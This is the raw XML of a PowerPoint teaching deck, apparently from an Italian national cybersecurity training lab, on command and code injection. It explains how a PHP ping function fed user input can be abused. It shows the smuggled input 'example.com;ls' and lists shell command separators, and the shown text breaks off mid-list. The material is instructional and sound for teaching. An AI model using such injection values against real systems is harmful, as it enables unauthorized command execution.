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567" r:id="rId2"/>
    <p:sldId id="1200" r:id="rId3"/>
    <p:sldId id="1204" r:id="rId4"/>
    <p:sldId id="1205" r:id="rId5"/>
    <p:sldId id="1083" r:id="rId6"/>
    <p:sldId id="1145" r:id="rId7"/>
    <p:sldId id="1095" r:id="rId8"/>
    <p:sldId id="1154" r:id="rId9"/>
    <p:sldId id="1101" r:id="rId10"/>
    <p:sldId id="1146" r:id="rId11"/>
    <p:sldId id="1112" r:id="rId12"/>
    <p:sldId id="1113" r:id="rId13"/>
    <p:sldId id="1114" r:id="rId14"/>
    <p:sldId id="1115" r:id="rId15"/>
    <p:sldId id="1116" r:id="rId16"/>
    <p:sldId id="1117" r:id="rId17"/>
    <p:sldId id="1110" r:id="rId18"/>
    <p:sldId id="1111" r:id="rId19"/>
    <p:sldId id="1102" r:id="rId20"/>
    <p:sldId id="1107" r:id="rId21"/>
    <p:sldId id="1108" r:id="rId22"/>
    <p:sldId id="1109" r:id="rId23"/>
    <p:sldId id="1104" r:id="rId24"/>
    <p:sldId id="1106" r:id="rId25"/>
    <p:sldId id="1105" r:id="rId26"/>
    <p:sldId id="1147" r:id="rId27"/>
    <p:sldId id="1118" r:id="rId28"/>
    <p:sldId id="1119" r:id="rId29"/>
    <p:sldId id="1120" r:id="rId30"/>
    <p:sldId id="1121" r:id="rId31"/>
    <p:sldId id="1122" r:id="rId32"/>
    <p:sldId id="1123" r:id="rId33"/>
    <p:sldId id="1152" r:id="rId34"/>
    <p:sldId id="1124" r:id="rId35"/>
    <p:sldId id="1126" r:id="rId36"/>
    <p:sldId id="1173" r:id="rId37"/>
    <p:sldId id="1148" r:id="rId38"/>
    <p:sldId id="1129" r:id="rId39"/>
    <p:sldId id="1130" r:id="rId40"/>
    <p:sldId id="1128" r:id="rId41"/>
    <p:sldId id="1131" r:id="rId42"/>
    <p:sldId id="1149" r:id="rId43"/>
    <p:sldId id="1132" r:id="rId44"/>
    <p:sldId id="1133" r:id="rId45"/>
    <p:sldId id="1134" r:id="rId46"/>
    <p:sldId id="1135" r:id="rId47"/>
    <p:sldId id="1136" r:id="rId48"/>
    <p:sldId id="1137" r:id="rId49"/>
    <p:sldId id="1150" r:id="rId50"/>
    <p:sldId id="1091" r:id="rId51"/>
    <p:sldId id="1138" r:id="rId52"/>
    <p:sldId id="1151" r:id="rId53"/>
    <p:sldId id="1093" r:id="rId54"/>
    <p:sldId id="1139" r:id="rId55"/>
    <p:sldId id="1094" r:id="rId56"/>
    <p:sldId id="1206" r:id="rId57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57B07-CEE8-69A4-1FC6-450705291C9D}" v="561" dt="2020-03-23T16:00:39.941"/>
    <p1510:client id="{159927DF-9079-47AF-856A-28B634CFFA85}" v="318" dt="2020-03-27T15:10:12.256"/>
    <p1510:client id="{46B3B5F8-7A67-1A8A-3C8E-2902AC14EF94}" v="16" dt="2020-03-23T14:45:48.650"/>
    <p1510:client id="{90A22A3B-5C5F-4A84-9AC4-735184955C64}" v="98" dt="2021-02-23T09:35:27.680"/>
    <p1510:client id="{9543370A-47A1-4F1D-8E47-8D1404FEA57D}" v="16105" dt="2020-03-23T12:31:52.262"/>
    <p1510:client id="{CFB23DF1-8789-83DF-AD5A-05CD41212907}" v="972" dt="2020-03-23T15:18:09.081"/>
    <p1510:client id="{D6B55E12-5D02-4D11-8412-1DC671FD4C06}" v="230" dt="2020-03-24T12:09:54.743"/>
    <p1510:client id="{F7F21C89-6611-4A08-84A5-C6EF5A113F85}" v="151" dt="2020-03-23T16:20:16.883"/>
    <p1510:client id="{F9398BC1-F240-4D6C-849C-F9DF64F1CCD0}" v="1190" dt="2020-03-23T14:10:54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2" d="100"/>
          <a:sy n="162" d="100"/>
        </p:scale>
        <p:origin x="14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EC17B-16E3-FA4B-9123-14A2B07F2CAE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C31AC-9BB5-A24B-A33F-BE9E31A46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290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9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8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8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5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Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> style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edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>styles</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Third </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>Fifth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>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rofondimento x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Approfondimento XX:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> style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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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200"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edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>styles</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Third </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>Fifth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>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2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Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>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 sz="12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ctr" anchorCtr="0"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lang="it-IT"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>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it-IT"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>styles</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Third </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>Fourth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>Fifth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>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lvl1pPr>
              <a:defRPr sz="1200" b="0"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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2800" b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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>styles</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="2800" b="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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pPr lvl="0"/>
            <a:r>
              <a:rPr lang="it-IT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ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:buNone/>
              <a:defRPr sz="4200" b="0"/>
            </a:lvl1pPr>
            <a:extLst/>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT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>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="3600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it-IT"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>styles</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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it-IT"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>styles</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Third </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>level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200" b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>
              <a:defRPr sz="120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lang="it-IT"/>
              <a:t>Click to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>edit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> Master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t> style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Box 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92BE3426-EED9-40E7-8151-63B530576F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532259" y="4916329"/>
            <a:ext cx="9220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10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© CINI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" baseline="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00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2021</a:t>
            </a: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B16DFBD6-46BA-4A3A-935B-FE42CEEA715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54306" y="4916688"/>
            <a:ext cx="99738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>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1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noProof="0" dirty="0"/>
              <a:t>Rel. 07.02.2021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16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9337E288-5691-415F-8EB2-7BB6817E20C3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52400" y="4682246"/>
            <a:ext cx="1524001" cy="450359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B2CA421F-2598-407D-8B87-A574C4E8D60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767" y="4763201"/>
            <a:ext cx="1068833" cy="3062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2" r:id="rId3"/>
    <p:sldLayoutId id="2147483653" r:id="rId4"/>
    <p:sldLayoutId id="2147483655" r:id="rId5"/>
    <p:sldLayoutId id="2147483656" r:id="rId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rgbClr val="00009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charset="2"/>
        <a:buChar char="Ø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" charset="2"/>
        <a:buChar char="Ø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charset="2"/>
        <a:buChar char="Ø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charset="2"/>
        <a:buChar char="Ø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charset="2"/>
        <a:buChar char="Ø"/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Helvetica Neue"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Helvetica Neue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6934200" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="365E8F"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0F243E"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="0">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="28398" dir="3806097" algn="ctr" rotWithShape="0">
              <a:srgbClr val="243F6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2663624"/>
            <a:ext cx="6934200" cy="1813126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="365F91">
                  <a:alpha val="36000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0066FF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0">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="28398" dir="3806097" algn="ctr" rotWithShape="0">
              <a:srgbClr val="243F60"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="468000" tIns="360000" rIns="360000" bIns="36000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Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>Command and Code injections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0" y="4686300"/>
            <a:ext cx="533400" cy="285750"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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EA82F60-B719-4839-9466-88EA10CEC9F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6955970" y="64790"/>
            <a:ext cx="2188030" cy="14401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it-IT" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Riccardo BONAFEDE</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Università di Padova</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400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42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DD7EABF-DC0B-46D2-A175-5397CB782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705694"/>
            <a:ext cx="22105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it-IT" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000099"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue Medium"/>
                <a:cs typeface="Helvetica Neue Medium"/>
              </a:rPr>
              <a:t>cybersecnatlab.it</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000099"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue Medium"/>
              <a:cs typeface="Helvetica Neue Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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4F66C7-1E30-405B-860E-4C6B95704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885" y="2814020"/>
            <a:ext cx="2160037" cy="63831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0EF036E-DA1E-462D-8A3C-007877B109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19" y="3742606"/>
            <a:ext cx="2005733" cy="5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54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6990-7D31-41CE-8ED0-05BE3479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Outline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70550-720E-4296-A137-81FBC8D6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326CC-0F93-4FD8-83AE-10C4FBE77C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85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Command Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Output Retrieving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Code Injections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>General Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>PHP Code Injections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tips and Tricks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Fixes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627568-05BA-41D4-92B1-5BE86AFACDE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612322" y="2416629"/>
            <a:ext cx="4653642" cy="203290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914B61-96C8-4248-BDE0-53560955BFBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539058" y="1411132"/>
            <a:ext cx="2424793" cy="30959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58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B886D-564D-41BF-88A1-CBB79661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Command Injection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AC2DF9-8004-480E-9D8F-F0636929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57C1B-1980-4411-BDB3-191CD1CFDB6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A command injection occurs when a web application passes unsafe data to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>system shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Let’s take as an example the following line of code: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6C2F6EC-210E-4C5E-A8D9-108683D29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350" y="2957371"/>
            <a:ext cx="4759300" cy="167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70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7D5C7-D912-4778-AE7D-D5CB5283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737EE3-C639-4113-A6D2-AD5C3744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AD0B3-FB9E-4A67-8029-B9BF5B687E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The goal of this line of code is to ping a host supplied </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by the user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For example, if the user puts as host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, PHP will execute the system command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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062EF7A2-F7FD-4D3A-A83A-2143A1C80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120" y="3407294"/>
            <a:ext cx="3368360" cy="122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348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A6B4-D6E8-41C6-BAE0-C1F5A057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5345A9-3EC8-4889-A9F9-CF27F3AB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944F6-DD18-4DE5-B612-26D26F9A7E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b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>If there is no input sanitization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, a rogue user could insert as hostname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example.com;ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas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In this way, PHP will execute the command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example.com;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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357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04D6-8A28-42EA-B399-E1271500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051A90-EADF-4777-B1BE-1BE252E6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DD351-E076-4E8C-ACEF-25D1DD98D8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Because bash and other system shells interpret the character "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>" as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>command separator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>, the command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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> will also be executed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We say that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ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>injected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87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2439-0341-4B7C-AFA2-71642CB1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2220F-6B91-4BB4-819C-710A5CF7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17E2D-807C-490C-AA9E-7E3B04C99B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There are a lot of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>special characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> in bash that permit to inject commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Other than ";", additional command separators are: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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>newline character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b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>\n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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Logic operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&amp;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
